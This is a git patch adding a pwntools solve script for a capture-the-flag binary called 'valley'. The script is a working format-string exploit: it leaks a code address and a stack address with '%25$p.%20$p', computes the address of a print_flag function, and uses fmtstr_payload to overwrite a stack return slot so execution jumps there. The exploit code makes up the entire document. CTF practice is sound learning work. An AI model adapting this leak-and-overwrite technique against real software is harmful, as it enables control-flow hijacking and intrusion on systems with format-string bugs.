From 1389af0b50528de486ee30d74e3a821fde2790c3 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Sun, 16 Mar 2025 22:32:35 +0300
Subject: [PATCH] solve script

---
 random_challs/valley/a.py | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 random_challs/valley/a.py

diff --git a/random_challs/valley/a.py b/random_challs/valley/a.py
new file mode 100644
index 0000000..e6775fe
--- /dev/null
+++ b/random_challs/valley/a.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./valley", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+ss = lambda a: r.sendline(a)
+
+# leak
+s(b"%25$p.%20$p")
+r.recvuntil(b": ")
+leaks = r.recvlineS().split(".")
+print_flag = int(leaks[0], 16) - 0x198
+log.info("print_flag: %#x", print_flag)
+stack_addr = int(leaks[1], 16)+0x8
+log.info("stack_addr: %#x", stack_addr)
+some_addr = print_flag + 0x2d97
+
+# write
+writes = {stack_addr:print_flag}
+fs = fmtstr_payload(6, writes, write_size='short')
+ss(fs)
+ss(b"exit")
+
+r.interactive()
\ No newline at end of file